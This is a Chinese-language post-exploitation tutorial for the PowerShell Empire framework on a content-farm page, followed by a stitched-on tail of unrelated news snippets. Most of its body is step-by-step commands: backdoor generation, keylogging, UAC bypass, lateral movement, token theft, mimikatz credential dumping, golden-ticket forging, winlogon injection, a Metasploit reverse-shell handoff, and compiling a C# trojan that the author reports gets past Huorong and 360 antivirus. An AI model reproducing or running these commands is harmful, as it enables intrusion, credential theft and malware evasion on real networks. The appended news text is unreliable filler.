范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文

PowerShellEmpire的后渗透利用

  Empire 后渗透框架主要用于 Windows 内网渗透,该框架主要基于 Powershell 和 Python,它提供了一个模块的架构,帮助攻击者可以创建和执行各种攻击策略,支持包括域内渗透、宏钓鱼、内网横向、权限维持、后门生成等多个模块。
  官网:http://www.powershellempire.com 0x01 下载安装
  安装 Empire 由两种方式,分别是基于源码安装和 apt 包安装 源码安装
  在 Github 中下载 Empire git clone https://github.com/EmpireProject/Empire
  直接安装 Empire 会报错 ./setup/install.sh
  需要安装以下 Python 库,当然在安装库时会遇到很多问题,以下是遇到问题后的解决方法 pip install pyOpenSSL pip install iptools pip install netifaces pip install pydispatch pip install pydispatcher pip install zlib_wrapper pip install macholib pip install xlrd pip install xlutils pip install pyminifier pip install dropbox pip install pefile
  importlib无法安装解决方法 apt-get install build-essential python3-dev python2-dev libssl-dev swig
  M2Crypto无法安装解决方法 pip install ~/Desktop/M2Crypto-0.38.0.tar.gz
  dispatch无法安装解决方法 pip install --upgrade setuptools
  CryPto.Cipher报错解决方法 pip uninstall crypto pip install pycrypto
  下载地址:https://pypi.org/project/M2Crypto/#files
  安装完成后成功启动 Empire
  APT包安装
  使用 apt 包安装 Empire apt install powershell-empire powershell-empire
  0x02 基础使用设置监听器
  进入 Empire 输入help可查看帮助文档
  输入listeners进入监听器设置,按tab自动补全(如果不清楚均可使用该方法)
  设置 http 监听器 uselistener http info #查看监听器信息
  在监听器模块中带有True属性的值必须填写,其他属性可能会存在默认值,使用set和unset可改变设置,首先设置监听器名为test set Name test
  设置监听默认是80端口,但是80端口通常是 Web 服务器,修改端口为8080 set Host http://172.16.54.51:8080 set Port 8080
  开启监听器 execute
  删除监听器 back list kill test
  生成后门
  使用usestager选择后门模块 usestager windows/launcher_bat
  设置监听器和输出目录 set Listener test set OutFile /tmp/lanuncher.bat #默认输出/tmp目录 execute
  在/tmp目录成功找到生成后门
  把输出的后门放入目标系统中执行,执行成功后收到响应 活动代理
  使用agents查看当前会话,通过interact进入会话 agents interact 22FLR8SU
  如果觉得会话名称太过复杂,可重命名会话 rename win7
  agents下可使用命令如下:
  命令执行
  查看系统信息 sysinfo
  查询agents命令 help agentscmds
  执行终端命令 shell whoami
  基本功能
  使用截图功能 sc
  使用键盘记录 usemodule collection/keylogger execute
  使用剪切版 usemodule collection/clipboard_monitor execute
  0x03 常见模块主机扫描
  ARP 扫描模块 sleep 0 #设置间隔时间 usemodule situational_awareness/network/arpscan set Range 192.168.0.1-192.168.0.100 execute
  SMB 扫描模块 usemodule situational_awareness/network/smbscanner set UserName administrator set Password mac  execute
  端口扫描模块 usemodule situational_awareness/network/portscan set Hosts 192.168.0.1-100 set Ports 445 execute
  信息收集
  查找本地管理员主机 usemodule situational_awareness/network/powerview/find_localadmin_access execute
  查看共享文件 usemodule situational_awareness/network/powerview/share_finder execute
  Windows 本地信息收集 usemodule situational_awareness/host/winenum execute
  权限提升
  当前权限并非管理员,需要提权操作
  使用 UAC bypass 模块提权 usemodule privesc/bypassuac set Listener test execute
  使用 powerup 检查可提权项,找到后可利用环境向量提权 usemodule privesc/powerup/allchecks set Listener test execute
  使用计划任务进行提权 usemodule persistence/elevated/schtasks* set Listener test execute
  通过溢出漏洞提权,比如烂土豆漏洞
  usemodule privesc/ms16-032 或 usemodule privesc/ms16-135 set Listener test execute
  成功提权至 SYSTEM agents
  0x04 域内渗透环境介绍DC: 192.168.52.138 T1: 192.168.52.128 192.168.0.100 D1: 192.168.52.141
  当前已取得域内普通用户mac和本地管理员权限 agents
  信息收集
  基础信息收集,包括系统信息、用户信息、网络环境等 sysinfo whoami info
  使用 ARP 扫描,成功找到192.168.52.0/24存在四台主机 usemodule situational_awareness/network/arpscan set Range 192.168.52.0/24 execute
  查找本地管理员 usemodule situation_awareness/network/powerview/find_localadmin_access execute
  查看当前用户是否为其他主机上的本地管理员 shell dir 192.168.52.141C$
  成功找到域控主机IP为192.168.52.138 usemodule situation_awareness/network/powerview/get_domain_controller execute
  横向移动
  使用会话注入需要管理员权限,切换本地管理员后把当前会话注入到其他主机上 usemodule lateral_movement/invoke_psexec set Listener test set ComputerName stu1 execute
  使用invoke_wmi模块相比invoke_psexec更加隐蔽 usemodule lateral_movement/invoke_wmi  set Listener test set ComputerName stu1 execute
  窃取token
  在新会话中查看进程发现域管理员进程 ps
  选择目标 PID 号后窃取域管理员 token steal_token 1740 shell dir OWAC$
  如果需要恢复原来的身份可使用以下命令 revtoself
  凭证获取
  利用 mimikatz 拿到管理员密码明文和哈希 mimikatz
  查看所有用户凭证如下: creds
  利用哈希传递可拿到域控访问权限 黄金票据
  在域控下使用lsadump模块获取域内所有用户哈希 usemodule credentials/mimikatz/lsadump creds
  成功拿到krbtgt用户哈希
  利用golden_ticket制作黄金票据 usemodule credentials/mimikatz/golden_ticket set credid 10 set user administrator execute
  0x05 会话管理会话生成
  使用spawn模块生成新会话 usemodule management/spawn set Listener test execute
  进程注入
  查看进程并选择需注入的进程ID ps
  成功注入winlogon进程 psinject test 1120
  注入这类系统进程不会出现蓝屏 MSF会话联动
  首先在 MSF 中设置 http 监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.0.50 set lport 4444 exploit -j
  在 Empire 中设置反弹,其中 payload 需要与上对应 usemodule code_execution/invoke_shellcode set Lhost 192.168.0.50 set Lport 4444 set Payload reverse_http execute
  经测试未受到反弹shell,查阅资料后发现 Empire 转到 MSF 存在局限性,具体可查看https://www.jianshu.com/p/c5153ee1eb76 0x06 Empire-Web下载安装
  Empire 存在 web 版本,把 PHP 和 Empire 结合的方式通过网页进行访问
  下载地址:https://github.com/interference-security/empire-web/
  下载 empire-web git clone https://github.com/interference-security/empire-web/
  安装 PHP 扩展,需根据本机的 PHP 版本进行修改 apt-get install php7.4-curl
  重启 Apache 后启用扩展 /etc/init.d/apache2 restart 基础使用
  设置绑定端口和登录账号密码 ./empire --rest --restport 1337 --username admin --password 3mpir3admin
  访问站点输入账号密码admin/3mpir3admin
  成功登录能够可视化各个模块
  查看Agents模块
  查看已获取的用户凭证
  查看文件系统
  0x07 免杀模块生成csharp木马
  准备 Visual Stido 用于编译 C# 文件
  下载地址:http://download.microsoft.com/download/B/0/F/B0F589ED-F1B7-478C-849A-02C8395D0995/VS2012_ULT_chs.iso
  生成 C# 类型木马 usestager windows/csharp_exe set Listener test info execute
  成功生成后门文件launcher.src
  csharp编译免杀
  使用 Visual Stdio 打开cmd.sln
  需要安装.net 2.0环境,打开程序与功能中的添加或删除程序安装net 3.5版本,如果无法安装,打开组策略》系统〉指定可选组件安装和组件修复的设置
  .net支持:https://dotnet.microsoft.com/en-us/download/visual-studio-sdks
  修改命名空间为mac123并添加花指令 var a = "12345678"; var b = "67890123";
  完成后编译生成程序文件
  免杀效果
  使用火绒成功免杀
  使用360成功免杀
  但是执行后360会对行为查杀,上线则不受影响
  成功进入新会话当中 interact XWVH8ME2

春节假期正好能用上!上午10点来壹刻宝抢贵阳文旅消费券2023癸卯兔年即将来临,春节期间,除了走亲访友,最惬意的事情,莫过于在氤氲的温泉池中卸下一身疲惫,回归属于自己的片刻宁静。贵阳人,是时候给自己安排冬天的第一场温泉之旅了,酒店民宿两款PS5独占游戏的PC版配置公布了,配置要求还挺高的尽管2023年才刚开始,但是不少游戏就要发售了。比如说死亡回归和Forspoken,这两款游戏的特别之处是主机上由PS5独占,但却能在PC上玩到。不过死亡回归是2021年首先在主机龙虎榜跨年妖股出现了?多家顶级游资抱团久其软件,炒股养家提前锁仓1亿筹码成最大赢家一龙虎榜热点分析周五A股虎年收官,权重股拉动各大指数集体上涨,全天25股涨停,6股连板,炸板率33。题材方面,信创板块保持绝对优势,恒久科技7天6板中远海科3板高斯贝尔2板智微智能智慧又健康的城市是什么样?城市更新,顾名思义,它分为城的更新和市的更新。所谓城的更新,它指空间和建筑的更新那市的更新,就是商业和服务业场景的更新。国外的城市发展,往往是先有市后有城而中国正好相反,往往是先有去年广东GDP为129118。58亿元,同比增1。92022年12月17日,广州,佛山市千门医药科技公司正在抓紧生产白云山感冒灵颗粒以及阿咖酚散。视觉中国图1月19日,广东省统计局发布2022年广东经济运行简况。根据地区生产总值统一重要提醒!这些年货上火车要限量!春节假期快要到了不少小伙伴已经踏上回家的路途还有正准备启程的小伙伴各大铁路客站也迎来了客流高峰准备坐火车回家的胖(bushi)友们注意啦有些年货需要限量携带有些物品过不了安检快来了评论丨迎着冰雪上,闯创干里见初心全力应对低温雨雪冰冻天气(图源央广网湖南省低温应急办供图)段宗科连日来,湖南遭遇低温雨雪天气,牵动着无数人的心。从中央媒体到全国各地媒体持续关注湖南发动3。6万余党员干部和志愿者上等你回家!这份春运出行安全手卡请收藏手绘随着春节临近今年春运已进入高峰时段根据预报今年春运期间多地会出现低温雨雪大雾等天气过程这些都会给出行带来不利影响那么我们该如何科学应对?这幅手绘科普手卡快收藏!除了要了解这些春运期盐田社区邀书法大师义写春联,向居民赠百幅对联新春伊始,春节将临,按照我国的传统习俗,家家户户总要贴上新的春联,以示辞旧迎新,期冀度过和和睦睦的除夕之夜,迎来甜甜美美的新春佳节。为了增强社区居民的归属感,营造喜庆祥和的节日氛围今年你的压岁钱还在被爸妈保管吗?临近过年,不少老人亲朋好友家长都会给孩子压岁钱。在不少人的记忆里,孩子压岁钱都是父母保管的,长大了,知道此保管非彼保管,也不会再追究压岁钱的去向。然而近日,邳州市人民法院办理了一起回眸团结报社2022年度十大关键词岁序常易,华章日新。虎年正在远去,兔年越来越近。今天,带您一起来看团结报社2022年度十大关键词!把做好党的二十大重大主题报道作为首要政治任务和贯穿全年新闻舆论工作的主线,以矢志不
谁说女儿不如男拖拉机,从未输过1老王打牌输了十块钱,被媳妇当众数落了。我看老王挺可怜,就安慰他说你这还算好的,上星期我在菜市场远远看见一个男人被他媳妇骂的狗血淋头,那才叫丢人!老王听完眼泪就下来四川蓬溪游泳池垮塌,监管部门去哪儿了?来论7月16日下午,四川遂宁蓬南镇某游乐中心一个游泳池发生垮塌。多段网络视频显示,游乐中心内一疑似气垫游泳池发生垮塌,游泳池内的水冲入附近一条河流,多人在河中疑似搜寻失踪人员。7月河南足球史十大名将中原广袤,人杰地灵,所谓一方水土,养一方豪杰。在体育的范畴,作为体育大省的河南,实在是出过许多名将,比如朱婷刘国梁郑海霞等等。在现代中国足球史上,河南足球也算得上是一股不可忽略的势唐山打人案,陈继志母亲是公安干部?为何官方通报后依然谣言四起6月10日2点40分左右唐山老汉城烧烤店,以陈继志为首的多名施暴者,对4名用餐女子进行残暴不仁的殴打,引发了全网愤慨。惨无人道的施暴手段让人看了胆战心惊,因挑战了大众安全感,众多网中国男子足球队解析一公元1888年,清朝举全国之力成立北洋水师,美国海军年鉴,曾对世界各国海军做过排名,清朝海军位列世界第九亚洲第一。1894年,北洋水师几乎被日军全歼。1931年,中国加入国际足联,金像奖获奖名单出炉85岁谢贤夺影帝创造最年长纪录,刘雅瑟封后第40届金像奖颁奖礼时隔三年终于回归线下举行了!虽然实体举办是在前一天才决定,但现场依然星光熠熠,不少电影人和演员赶来参加盛会,也是看点不断。颁奖礼现场大家关注最多的自然是奖项花落德国能源机构官员没有俄罗斯天然气,德国无法度过今年冬天德国工人安装码头管道。(资料图)海外网7月17日电据俄罗斯卫星通讯社17日消息,德国能源监管机构联邦网络局局长克劳斯米勒当天接受德国星期日图片报采访时表示,德国的储气设施目前还不够网传宁波象山一护士在抢救过程中玩手机官方称其联系其他医务人员支援抢救央广网宁波7月17日消息(记者刘欣莹)据宁波市象山县卫生健康局消息,2022年7月16日晚,有网友在抖音等网络平台发视频,称宁波市象山县第一人民医院护士在抢救过程中玩手机。经查,该自驾游男子为省1800元过路费拉12箱芒果走绿通,官方回应近日,一男子从云南西双版纳到河北唐山,为省下1800元高速过路费拉12箱芒果走绿通的视频引发关注。17日上午,云南交投工作人员表示,皮卡车属于货车,只要拉的是符合要求的鲜活农产品,法国巴黎游记巴黎位于法国北,塞纳河穿市中心。人口一千一百万,建都一千四百年。城市划分二十区,顺着时针而排名。塞纳河岸第一区,皇室宫殿和教堂。政府机关所在地,举世闻名卢浮宫。九月大道是二区,国家工人收工路上因热射病去世,家属称未签合同无法认定工伤,官方回应近日,全国多地遭遇热浪侵袭,几乎每天都有中暑患者送医,其中不少患者确诊为热射病。据媒体16日报道,7月5日,在陕西省西安市高新区兴隆街道甫张村,建筑工人王某某倒在了收工回家的路上,